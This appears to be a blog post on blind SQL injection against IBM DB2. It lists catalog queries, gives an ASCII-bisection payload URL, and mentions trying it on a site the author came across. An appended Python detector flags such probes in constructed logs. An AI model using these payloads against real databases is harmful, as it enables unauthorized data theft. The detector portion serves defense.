Fewer people use DB2. Today I came across a DB2 website for injection and wanted to try my skills. However, it is difficult to find relevant information online, so I had to study it myself.
Referring to the IBM DB2 documentation, we summarized the following points:
1. select NAME from where CREATOR =USER
Returns the names of the tables created by all users in the system.
2. select NAME from where TBCREATOR = '' and TBNAME=''
Returns the column names of the table.
3. select NAME from where CREATOR =USER FETCH FIRST 1 ROWS ONLY
This is the most critical point: it returns only the first record, similar to top 1 in SQL Server.
4. SUBSTR(string, position, length)
Returns a substring of a string, similar to mid.
5. ASCII() needs no further explanation.
With these statements and functions, we can easily guess all table names, field names, and the data in them using the ASCII bisection (binary search) method.
For example, to determine whether the ASCII code of the first character of the first table name is greater than 50:
http://*.com??id=1 and (select ASCII(SUBSTR(NAME,1,1)) from where CREATOR =USER FETCH FIRST 1 ROWS ONLY)>50 --
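Seen from the defending side, the bisection described above leaves a recognizable trail in web logs: one client repeating the same ASCII(SUBSTR(...)) ... FETCH FIRST 1 ROWS ONLY comparison against changing thresholds. The detector below is an added example, not part of the original post; the log lines, the /view and /search paths, the client addresses, the thresholds other than 50 and PLACEHOLDER_TABLE (standing in for the table name the post leaves out) are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Shape of the probe on this page: ASCII(SUBSTR(col, pos, len)) inside a subquery
# that ends in FETCH FIRST n ROWS ONLY, compared against a number.
PROBE = re.compile(
    r"ascii\s*\(\s*substr\s*\([^,()]+,\s*(?P<pos>\d+)\s*,\s*\d+\s*\)\s*\)"
    r".*?fetch\s+first\s+\d+\s+rows?\s+only\s*\)\s*(?P<op>[<>]=?|=)\s*(?P<val>\d+)",
    re.IGNORECASE | re.DOTALL,
)

def parse_probe(target):
    """Return (char position, operator, threshold) if the request carries the probe."""
    m = PROBE.search(unquote_plus(target))  # decode %xx and '+' before matching
    return (int(m["pos"]), m["op"], int(m["val"])) if m else None

def flag_bisection(log, min_thresholds=3):
    """Clients that test one character position against several different thresholds."""
    seen = defaultdict(set)  # (client, position) -> thresholds seen
    for client, target in log:
        probe = parse_probe(target)
        if probe:
            seen[(client, probe[0])].add(probe[2])
    return sorted({c for (c, _), vals in seen.items() if len(vals) >= min_thresholds})

# Constructed sample data; PLACEHOLDER_TABLE is not a real catalog name.
TEMPLATE = ("/view?id=1+and+(select+ASCII(SUBSTR(NAME,{pos},1))+from+PLACEHOLDER_TABLE"
            "+where+CREATOR+=USER+FETCH+FIRST+1+ROWS+ONLY){op}{val}+--")
SAMPLE_LOG = [
    ("203.0.113.7", TEMPLATE.format(pos=1, op=">", val=50)),
    ("203.0.113.7", TEMPLATE.format(pos=1, op="%3E", val=75)),  # URL-encoded '>'
    ("203.0.113.7", TEMPLATE.format(pos=1, op=">", val=62)),
    ("198.51.100.4", "/view?id=1"),
    ("198.51.100.4", "/search?q=ascii+table+substr+function"),  # benign words only
    ("192.0.2.9", TEMPLATE.format(pos=1, op=">", val=50)),  # one probe, below threshold
]

if __name__ == "__main__":
    for client, target in SAMPLE_LOG:
        print(client, parse_probe(target))
    print("bisection suspected from:", flag_bisection(SAMPLE_LOG))
```

A single matching request is already worth an alert; the grouping step only separates a one-off probe from an extraction that is in progress.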